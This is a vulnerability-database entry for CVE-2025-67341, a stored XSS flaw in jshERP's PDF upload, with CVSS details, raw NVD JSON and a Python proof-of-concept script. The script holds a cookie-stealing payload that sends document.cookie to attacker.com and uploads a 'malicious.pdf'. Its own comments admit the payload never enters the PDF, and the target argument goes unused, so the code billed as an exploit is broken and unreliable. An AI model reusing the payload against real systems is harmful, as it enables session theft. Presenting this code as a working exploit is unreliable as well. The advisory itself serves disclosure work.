Security Vulnerability Report
CVE-2025-67341 CVSS 4.6 MEDIUM

CVE-2025-67341

Published: 2025-12-12 16:15:45
Last Modified: 2025-12-19 20:15:13

Description

jshERP versions 3.5 and earlier are affected by a stored XSS vulnerability. This vulnerability allows attackers to upload PDF files containing XSS payloads. Additionally, these PDF files can be accessed via static URLs, making them accessible to all users.

CVSS Details

CVSS Score: 4.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:* - VULNERABLE
jshERP <= 3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67341 PoC - jshERP Stored XSS via PDF Upload
# Author: Security Researcher
# Target: jshERP <= 3.5
import requests
import sys


# Generate the PDF used for the upload test
def generate_xss_pdf():
    # PDF header
    pdf_content = b'%PDF-1.4\n'
    # XSS payload string (as written, it is never added to pdf_content)
    xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
    # Minimal PDF skeleton: catalog, page tree and one page (no JavaScript action object)
    pdf_content += b'1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj\n'
    pdf_content += b'2 0 obj<</Type/Pages/Kids[3 0 R]/Count 1>>endobj\n'
    pdf_content += b'3 0 obj<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]>>endobj\n'
    pdf_content += b'xref\n0 4\n0000000000 65535 f\n0000000009 00000 n\n0000000058 00000 n\n0000000115 00000 n\n'
    pdf_content += b'trailer<</Size 4/Root 1 0 R>>\n'
    pdf_content += b'startxref\n0\n%%EOF\n'
    return pdf_content


# Upload the PDF
# target_url is accepted but not used; the request goes to upload_endpoint
def exploit(target_url, upload_endpoint):
    pdf_data = generate_xss_pdf()
    files = {'file': ('malicious.pdf', pdf_data, 'application/pdf')}
    try:
        response = requests.post(upload_endpoint, files=files)
        if response.status_code == 200:
            print('[+] Malicious PDF uploaded successfully!')
            print('[+] Access the PDF at the returned URL to trigger XSS')
            return True
    except Exception as e:
        print(f'[-] Error: {e}')
    # Reached on a non-200 response or on a request error
    return False


if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f'Usage: python {sys.argv[0]} <target_url> <upload_endpoint>')
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2])

References

https://github.com/jishenghua/jshERP/issues/139 (Exploit, Issue Tracking, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67341", "sourceIdentifier": "[email protected]", "published": "2025-12-12T16:15:45.150", "lastModified": "2025-12-19T20:15:13.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "jshERP versions 3.5 and earlier are affected by a stored XSS vulnerability. This vulnerability allows attackers to upload PDF files containing XSS payloads. Additionally, these PDF files can be accessed via static URLs, making them accessible to all users."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.5", "matchCriteriaId": "86D8B100-BC9D-41B2-9625-36738A2CF5E5"}]}]}], "references": [{"url": "https://github.com/jishenghua/jshERP/issues/139", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}